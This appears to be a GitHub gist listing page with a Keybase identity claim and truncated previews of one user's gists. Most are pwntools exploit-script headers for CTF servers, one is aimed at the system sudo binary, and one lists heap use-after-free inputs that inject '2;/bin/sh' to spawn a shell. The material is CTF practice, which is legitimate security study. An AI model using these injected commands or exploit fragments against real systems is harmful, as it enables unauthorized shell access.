I hereby claim:
- I am iamalsaher on github.
- I am iamalsaher (https://keybase.io/iamalsaher) on keybase.
- I have a public key ASC2ainpBPngd1KAmYAXbYSD8JF_ZNVOY0Kx2kcMfrEIbAo
To claim this, I am signing this object:
package main | |
import ( | |
//This is a modified version of natefinch's npipe where I exposed the handle in PipeConn struct so that I can use it as needed | |
"sepipe/npipe" | |
"bytes" | |
"fmt" | |
"io" | |
"os" | |
"sync" |
package manager | |
import ( | |
"bytes" | |
"errors" | |
"io" | |
"os/exec" | |
"sync" | |
"time" | |
) |
#!/usr/bin/env python2 | |
import sys,os | |
from pwn import * | |
TARGET=os.path.realpath("/usr/bin/sudo") | |
def setFlags(flags): | |
tgetpassFlags = { | |
"TGP_NOECHO":0x00, |
from Crypto.Util.number import * | |
from gmpy2 import * | |
from Crypto.PublicKey.RSA import importKey | |
key = importKey(open("PublicKey.pem").read()) | |
print (key.n) | |
print (key.e) | |
print long_to_bytes(195859165006622592278228905243976739313345311002376698392014723869927931336851714245606129350201186625593292413) |
#!/usr/bin/env python2 | |
import sys,os | |
from pwn import * | |
HOST="52.9.166.247" | |
PORT=1337 | |
def exploit(r): |
#!/usr/bin/env python2 | |
import sys,os | |
from pwn import * | |
HOST="13.56.97.226" | |
PORT=1337 | |
TARGET=os.path.realpath("manipulate") | |
LIBRARY="" |
#!/usr/bin/env python2 | |
import sys,os | |
from pwn import * | |
HOST="13.57.200.124" | |
PORT=1337 | |
def exploit(r): |
2 #set the month | |
12 #set month as december | |
1 #set year | |
2 #set year as 2, allocate a chunk | |
5 #free the chunk, this will free the year chunk to be used anywhere | |
4 #set an admin, this will allocate the year chunk for itself, and we can put arbitrary data for year chunk | |
2;/bin/sh #set this as an admin, this will get stored in the original year chunk, effectively being reused after being called | |
3 #show calender and exec system (cal 12 2;/bin/sh) effectively popping shell |
#!/usr/bin/python2 | |
from pwn import * | |
import sys | |
LOCAL = True | |
HOST = "13.233.178.121" | |
PORT = 1337 | |
BINARY = "./rop" |
I hereby claim:
To claim this, I am signing this object: